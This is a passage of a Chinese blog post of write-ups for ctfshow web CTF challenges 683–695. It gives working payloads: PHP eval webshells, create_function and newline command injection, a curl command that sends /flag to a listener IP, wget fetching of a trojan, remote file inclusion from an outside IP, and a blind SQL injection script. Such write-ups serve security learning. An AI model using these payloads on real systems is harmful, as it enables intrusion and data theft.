&amp; (<span class="number">0xFF</span> &gt;&gt; index);</span><br><span class="line">            index = (index + <span class="number">5</span>) % <span class="number">8</span>;</span><br><span class="line">            digit &lt;&lt;= index;</span><br><span class="line">            digit |= (nextByte &gt;&gt; (<span class="number">8</span> - index));</span><br><span class="line">            i++;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            digit = (currByte &gt;&gt; (<span class="number">8</span> - (index + <span class="number">5</span>))) &amp; <span class="number">0x1F</span>;</span><br><span class="line">            index = (index + <span class="number">5</span>) % <span class="number">8</span>;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (index == <span class="number">0</span>) &#123;</span><br><span class="line">                i++;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        retrunString = retrunString + BASE32CHAR.charAt(digit);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">while</span>((retrunString.length % <span class="number">8</span>) !== <span class="number">0</span>)&#123;</span><br><span class="line">        retrunString += <span class="string">&quot;=&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> retrunString;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<p>分析代码，要求flag符合下列条件</p>
<ol>
<li>前八位为字符串<code>ctfshow&#123;</code>，结尾为<code>&#125;</code></li>
<li>flag经过sha256运算的结果为<code>e3a331710b01ff3b3e34d5f61c2c9e1393ccba3e31f814e7debd537c97ed7d3d</code></li>
<li>中间内容长度为36，有4个UUID分块<code>-</code></li>
<li>c2n函数的作用：将UUID中的内容转换为10进制数</li>
<li>s2n2su函数的作用：将UUID中每一位的数字相加并返回最终的值</li>
<li>第一个UUID分段的UUID和值为63</li>
<li>第一个UUID分段的前四位经过sha256运算后的结果是<code>c578feba1c2e657dba129b4012ccf6a96f8e5f684e2ca358c36df13765da8400</code>，结果为<code>592b</code></li>
<li>第一个UUID分段后4位经过sha256运算后的结果是<code>f9c1c9536cc1f2524bc3eadc85b2bec7ff620bf0f227b73bcb96c1f278ba90dc</code>，结果为<code>9d77</code></li>
<li>第二个UUID分段是<code>9dda</code></li>
<li>第三个UUID的第二位是e，并且剩余三位的连接后为430</li>
<li>第四个UUID为<code>94a4</code></li>
<li>第五个UUID经过base32编码结果为<code>GVSTMNDGGQ2DSOLBGUZA====</code></li>
</ol>
<p>最终构造出flag</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctfshow&#123;592b9d77-9dda-4e30-94a4-5e64f4499a52&#125;</span><br></pre></td></tr></table></div></figure>

<p>顺便贴个爆破脚本</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> *</span><br><span class="line">string=<span class="string">&quot;0123456789abcdef&quot;</span></span><br><span class="line">k=product(string,repeat=<span class="number">4</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> k:</span><br><span class="line">    aaa=<span class="string">&quot;&quot;</span>.join(i)</span><br><span class="line">    out1 = hashlib.sha256(aaa.encode(<span class="string">&quot;utf-8&quot;</span>)).hexdigest()</span><br><span class="line">    <span class="keyword">if</span>(out1==<span class="string">&#x27;c578feba1c2e657dba129b4012ccf6a96f8e5f684e2ca358c36df13765da8400&#x27;</span>):</span><br><span class="line">        <span class="built_in">print</span>(aaa)</span><br><span class="line">    <span class="keyword">if</span>(out1==<span class="string">&#x27;f9c1c9536cc1f2524bc3eadc85b2bec7ff620bf0f227b73bcb96c1f278ba90dc&#x27;</span>):</span><br><span class="line">        <span class="built_in">print</span>(aaa)</span><br></pre></td></tr></table></div></figure>

<p><strong>683</strong></p>
<p>明显的弱类型比较</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">   <span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>; </span><br><span class="line">   <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;秀&#x27;</span>]))&#123; </span><br><span class="line">       <span class="keyword">if</span>(!is_numeric(<span class="variable">$_GET</span>[<span class="string">&#x27;秀&#x27;</span>]))&#123; </span><br><span class="line">          <span class="keyword">die</span>(<span class="string">&#x27;必须是数字&#x27;</span>); </span><br><span class="line">       &#125;<span class="keyword">else</span> <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;秀&#x27;</span>] &lt; <span class="number">60</span> * <span class="number">60</span> * <span class="number">24</span> * <span class="number">30</span> * <span class="number">2</span>)&#123; </span><br><span class="line">          <span class="keyword">die</span>(<span class="string">&#x27;你太短了&#x27;</span>); </span><br><span class="line">       &#125;<span class="keyword">else</span> <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;秀&#x27;</span>] &gt; <span class="number">60</span> * <span class="number">60</span> * <span class="number">24</span> * <span class="number">30</span> * <span class="number">3</span>)&#123; </span><br><span class="line">           <span class="keyword">die</span>(<span class="string">&#x27;你太长了&#x27;</span>); </span><br><span class="line">       &#125;<span class="keyword">else</span>&#123; </span><br><span class="line">           sleep((<span class="keyword">int</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;秀&#x27;</span>]); </span><br><span class="line">           <span class="keyword">echo</span> <span class="variable">$flag</span>; </span><br><span class="line">       &#125; </span><br><span class="line">   &#125; </span><br></pre></td></tr></table></div></figure>

<p>自动转换时xex会被转换为原始数字，int强制转换string时取到字母停止</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?秀=0.6e7</span><br></pre></td></tr></table></div></figure>

<p><strong>684</strong></p>
<p>源码在此</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$action</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;action&#x27;</span>] ?? <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="variable">$arg</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;arg&#x27;</span>] ?? <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^[a-z0-9_]*$/isD&#x27;</span>, <span class="variable">$action</span>)) &#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="variable">$action</span>(<span class="string">&#x27;&#x27;</span>, <span class="variable">$arg</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<p>变量$action要出现数字字母以外的字符，还要执行函数，使用\create_function，这里利用的是php环境中默认的namespace</p>
<blockquote>
<p>php里默认命名空间是\，所有原生函数和类都在这个命名空间中。普通调用一个函数，如果直接写函数名function_name()调用，调用的时候其实相当于写了一个相对路径；而如果写\function_name() 这样调用函数，则其实是写了一个绝对路径。 如果你在其他namespace里调用系统类，就必须写绝对路径这种写法。 接下来第二个参数可以引发危险的函数。</p>
</blockquote>
<blockquote>
<p>create_function()是PHP中的内置函数，用于在PHP中创建匿名(lambda-style)函数。</p>
<p><strong>用法:</strong></p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">string create_function ( $args, $code )</span><br></pre></td></tr></table></div></figure>

<p><strong>参数：</strong>该函数接受以下两个参数：</p>
<ul>
<li>**$args:**它是一个字符串类型的函数参数。</li>
<li>**$code:**它是字符串类型的函数代码。</li>
</ul>
<p><strong>注意：</strong>通常，这些参数将作为单引号分隔的字符串传递。使用单引号引起来的字符串的原因是为了防止变量名被解析，否则，将需要双引号来转义变量名，例如\ $avar。</p>
<p><strong>返回值：</strong>此函数以字符串形式返回唯一的函数名称，否则，在错误时返回FALSE。</p>
</blockquote>
<p>而对于create_function函数来说，实际执行的内容如下</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">function noname($args) &#123; $code &#125;</span><br></pre></td></tr></table></div></figure>

<p>结尾我们使用}闭合，最终的payload如下</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?action=%5ccreate_function&amp;arg=&#125;system(&#x27;tac /secret_you_never_know&#x27;);/*</span><br></pre></td></tr></table></div></figure>

<p><strong>685</strong></p>
<p>利用正则最大回溯次数绕过</p>
<blockquote>
<p>PHP 为了防止正则表达式的拒绝服务攻击（reDOS），给 pcre 设定了一个回溯次数上限 pcre.backtrack_limit<br>回溯次数上限默认是 100 万。如果回溯次数超过了 100 万，preg_match 将不再返回非 1 和 0，而是 false。这样我们就可以绕过正则表达式了。</p>
</blockquote>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://b826efef-6cde-4fa8-84d3-4cb699605ab2.challenge.ctf.show&quot;</span></span><br><span class="line">files=&#123;</span><br><span class="line">	<span class="string">&#x27;file&#x27;</span>:<span class="string">&#x27;&lt;?php eval($_POST[1]);?&gt;&#x27;</span>+<span class="string">&#x27;b&#x27;</span>*<span class="number">1000000</span></span><br><span class="line">&#125;</span><br><span class="line">r=requests.post(url,files=files)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></div></figure>

<p><strong>686</strong></p>
<p>无参RCE</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload:?code=system(current(getallheaders()));</span><br><span class="line">X-Forwarded-Host: cat /secret_you_never_know</span><br></pre></td></tr></table></div></figure>

<p><strong>687</strong></p>
<p>换行执行命令</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?ip=1%0atac /flaaag</span><br></pre></td></tr></table></div></figure>

<p><strong>688</strong></p>
<p>俩函数一起用有的问题</p>
<p><code>escapeshellarg(); escapeshellcmd();</code></p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?url=http://监听使用的ip:port/&#x27; -F file=@/flag&#x27;</span><br></pre></td></tr></table></div></figure>

<p>实际传入shell的是</p>
<figure class="highlight shell"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl &#x27;http://IP:端口/&#x27;\\&#x27;&#x27; -F file=@/flag&#x27;\\&#x27;&#x27;&#x27;</span><br></pre></td></tr></table></div></figure>

<p>直接带出文件</p>
<p><strong>689</strong></p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>) &amp;&amp; !<span class="keyword">empty</span>(<span class="variable">$_GET</span>))&#123;</span><br><span class="line">    <span class="variable">$url</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">    <span class="variable">$path</span> = <span class="string">&quot;upload/&quot;</span>.<span class="variable">$_GET</span>[<span class="string">&#x27;path&#x27;</span>];</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(strpos(<span class="variable">$path</span>,<span class="string">&#x27;..&#x27;</span>) &gt; -<span class="number">1</span>)&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;This is a waf!&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(strpos(<span class="variable">$url</span>,<span class="string">&#x27;http://127.0.0.1/&#x27;</span>) === <span class="number">0</span>)&#123;</span><br><span class="line">    file_put_contents(<span class="variable">$path</span>, file_get_contents(<span class="variable">$url</span>));</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;console.log(<span class="subst">$path</span> update successed!)&quot;</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;Hello.CTFshow&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<p>这里在path位置没有过滤，也就是说不管我们在path位置写入什么都会原封不动的返回，所以此时我们让docker访问自己，在path处传入木马即可</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://f784bf7a-ace9-414a-bbfd-cfd348cefd95.challenge.ctf.show/?file=http://127.0.0.1/?file=http://127.0.0.1/%26path=%3C?php%20eval($_POST[1]);?%3E&amp;path=b.php</span><br></pre></td></tr></table></div></figure>

<p><strong>690</strong></p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="variable">$args</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;args&#x27;</span>];</span><br><span class="line"><span class="keyword">for</span> ( <span class="variable">$i</span>=<span class="number">0</span>; <span class="variable">$i</span>&lt;count(<span class="variable">$args</span>); <span class="variable">$i</span>++ )&#123;</span><br><span class="line">    <span class="keyword">if</span> ( !preg_match(<span class="string">&#x27;/^\w+$/&#x27;</span>, <span class="variable">$args</span>[<span class="variable">$i</span>]) )</span><br><span class="line">        <span class="keyword">exit</span>(<span class="string">&quot;sorry&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">exec(<span class="string">&#x27;./ &#x27;</span> . implode(<span class="string">&quot; &quot;</span>, <span class="variable">$args</span>));</span><br></pre></td></tr></table></div></figure>

<p>传入的命令中只能有字母和数字，执行命令可用换行绕过，问题是我们要如何构造命令来执行，首先因为没有回显，所以直接执行是行不通的，那可以尝试写一个文件，构造一个服务器返回内容为一句话木马的脚本</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>构造如下命令</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mkdir a</span><br><span class="line">cd a</span><br><span class="line">wget 10进制服务器IP</span><br></pre></td></tr></table></div></figure>

<p>此时a文件夹下就有一个index.html内容为一句话木马，但是我们还没办法执行，此时我们利用tar来将文件类型进行更改</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar cvf shell a</span><br></pre></td></tr></table></div></figure>

<p>将a文件夹打包成一个shell文件就可以执行了</p>
<p><strong>691</strong></p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;inc.php&#x27;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span>   <span class="title">filter</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">      <span class="variable">$filterlist</span> = <span class="string">&quot;/\(|\)|username|password|where|</span></span><br><span class="line"><span class="string">      case|when|like|regexp|into|limit|=|for|;/&quot;</span>;</span><br><span class="line">      <span class="keyword">if</span>(preg_match(<span class="variable">$filterlist</span>,strtolower(<span class="variable">$str</span>)))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;illegal input!&quot;</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">return</span> <span class="variable">$str</span>;</span><br><span class="line">  &#125;</span><br><span class="line"><span class="variable">$username</span> = <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>])?</span><br><span class="line">filter(<span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>]):<span class="keyword">die</span>(<span class="string">&quot;please input username!&quot;</span>);</span><br><span class="line"><span class="variable">$password</span> = <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>])?</span><br><span class="line">filter(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>]):<span class="keyword">die</span>(<span class="string">&quot;please input password!&quot;</span>);</span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;select * from admin where  username =</span></span><br><span class="line"><span class="string"> &#x27;<span class="subst">$username</span>&#x27; and password = &#x27;<span class="subst">$password</span>&#x27; &quot;</span>;</span><br><span class="line"><span class="variable">$res</span> = <span class="variable">$conn</span> -&gt; query(<span class="variable">$sql</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$res</span>-&gt;num_rows&gt;<span class="number">0</span>)&#123;</span><br><span class="line">  <span class="variable">$row</span> = <span class="variable">$res</span> -&gt; fetch_assoc();</span><br><span class="line">  <span class="keyword">if</span>(<span class="variable">$row</span>[<span class="string">&#x27;id&#x27;</span>])&#123;</span><br><span class="line">     <span class="keyword">echo</span> <span class="variable">$row</span>[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">  &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">   <span class="keyword">echo</span> <span class="string">&quot;The content in the password column is the flag!&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></div></figure>

<p>order by盲注，贴个<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/104908543" >链接</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>，原理就是通过password位置的字符串的比较导致回显中username的内容不同来判断结果，直接写脚本吧</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">flagstr=<span class="string">&quot;-01234567890abcdefghiostw&#123;&#125;---&quot;</span></span><br><span class="line">url=<span class="string">&quot;http://9446af78-f5bd-4d30-94b4-05dc5eb8f887.challenge.ctf.show/&quot;</span></span><br><span class="line">flag=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">100</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="built_in">len</span>(flagstr)):</span><br><span class="line">        tmp=flag+flagstr[j]</span><br><span class="line">        data=&#123;<span class="string">&#x27;username&#x27;</span>:<span class="string">f&quot;&#x27;or 1 union select 1,2,&#x27;<span class="subst">&#123;tmp&#125;</span>&#x27; order by 3#&quot;</span>,<span class="string">&quot;password&quot;</span>:<span class="string">&quot;1&quot;</span>&#125;</span><br><span class="line">        tex=requests.post(url=url,data=data).text</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;&lt;/code&gt;admin&quot;</span> <span class="keyword">in</span> tex:</span><br><span class="line">            <span class="built_in">print</span>(flag+flagstr[j-<span class="number">1</span>])</span><br><span class="line">            flag=flag+flagstr[j-<span class="number">1</span>]</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></div></figure>

<p><strong>692</strong></p>
<p>看一下preg_replace函数的用法</p>
<blockquote>

        <h1 id="preg-replace"   >
          <a href="#preg-replace" class="heading-link"><i class="fas fa-link"></i></a><a href="#preg-replace" class="headerlink" title="preg_replace"></a>preg_replace</h1>
      <p>(PHP 4, PHP 5, PHP 7, PHP 8)</p>
<p>preg_replace — 执行一个正则表达式的搜索和替换</p>

        <h3 id="说明"   >
          <a href="#说明" class="heading-link"><i class="fas fa-link"></i></a><a href="#说明" class="headerlink" title="说明"></a>说明</h3>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">preg_replace(</span><br><span class="line">  string|array $pattern,</span><br><span class="line">  string|array $replacement,</span><br><span class="line">  string|array $subject,</span><br><span class="line">  int $limit = -1,</span><br><span class="line">  int &amp;$count = null</span><br><span class="line">): string|array|null</span><br></pre></td></tr></table></div></figure>

<p>搜索 <code>subject</code> 中匹配 <code>pattern</code> 的部分，以 <code>replacement</code> 进行替换。</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">replacement</span><br></pre></td></tr></table></div></figure>

<p>用于替换的字符串或字符串数组。如果这个参数是一个字符串，并且 <code>pattern</code> 是一个数组，那么所有的模式都使用这个字符串进行替换。如果 <code>pattern</code> 和 <code>replacement</code> 都是数组，每个 <code>pattern</code> 使用 <code>replacement</code>中对应的元素进行替换。如果 <code>replacement</code> 中的元素比 <code>pattern</code> 中的少，多出来的 <code>pattern</code> 使用空字符串进行替换。</p>
<p><code>replacement</code> 中可以包含后向引用 <code>\\n</code> 或 <code>$n</code>，语法上首选后者。 每个这样的引用将被匹配到的第 n 个捕获子组捕获到的文本替换。 n 可以是0-99，<code>\\0</code> 和 <code>$0</code> 代表完整的模式匹配文本。捕获子组的序号计数方式为：代表捕获子组的左括号从左到右， 从1开始数。如果要在 <code>replacement</code> 中使用反斜线，必须使用 4 个(<code>&quot;\\\\&quot;</code>，译注：因为这首先是 PHP 的字符串，经过转义后，是两个，再经过正则表达式引擎后才被认为是一个原文反斜线)。</p>
</blockquote>
<p>此处如果将replacement中内容放入<code>\\0</code>那么就会直接匹配前面pattern中的结果</p>
<blockquote>
<p>preg_replace中的第二个参数如果是%00也就是ascii中的0,那么将会匹配到整个字符串。<br>比如初始的字符串为<br>$option=’123’;<br>如果执行<br>preg_replace(“$option=’.*’;”,”\x00”,$a)<br>那么返回的结果是<br>$option=’$option=’123’;’;<br>其实就是把原来的字符串又放到单引号里面了。<br>假设我们第一次传option=;phpinfo();//<br>首先config.php中的内容会被替换成$option=’;phpinfo();//‘。<br>如果我们第二次传option=%00<br>那么最终的结果是$option=’$option=’;phpinfo();//‘’<br>这样就逃出了单引号，phpinfo()也就执行成功<br>————————————————<br>版权声明：本文为CSDN博主「yu22x」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。<br>原文链接：<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/122998220" >https://blog.csdn.net/miuzzx/article/details/122998220</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</blockquote>
<p><strong>693</strong></p>
<p>extract函数加远程文件包含</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?function=extract&amp;file=http://45.15.131.101/</span><br></pre></td></tr></table></div></figure>

<p><strong>694</strong></p>
<p>构造X-Forwarded-For请求头为文件名，file为.即可直接写入到请求头所构造的文件名中</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/var/www/html/a.php/.</span><br></pre></td></tr></table></div></figure>

<p>695</p>
<script type="text&#x2F;javascript" src="https://unpkg.com/kity@2.0.4/dist/kity.min.js"></script><script type="text&#x2F;javascript" src="https://unpkg.com/kityminder-core@1.4.50/dist/kityminder.core.min.js"></script><script defer="true" type="text&#x2F;javascript" src="https://unpkg.com/hexo-simple-mindmap@0.8.0/dist/mindmap.min.js"></script><link rel="stylesheet" type="text&#x2F;css" href="https://unpkg.com/hexo-simple-mindmap@0.8.0/dist/mindmap.min.css"></div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="http://jlan.darkflow.top">Jlan</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="http://jlan.darkflow.top/posts/76fe6b8e.html">http://jlan.darkflow.top/posts/76fe6b8e.html</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/posts/f85e0a9a.html"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">大佬文章合集</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/posts/63f03572.html"><span class="paginator-prev__text">Java入门</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div><div class="comments" id="comments"><div id="valine-container"></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#preg-replace"><span class="toc-number">1.</span> <span class="toc-text">
          preg_replace</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%B4%E6%98%8E"><span class="toc-number">1.0.1.</span> <span class="toc-text">
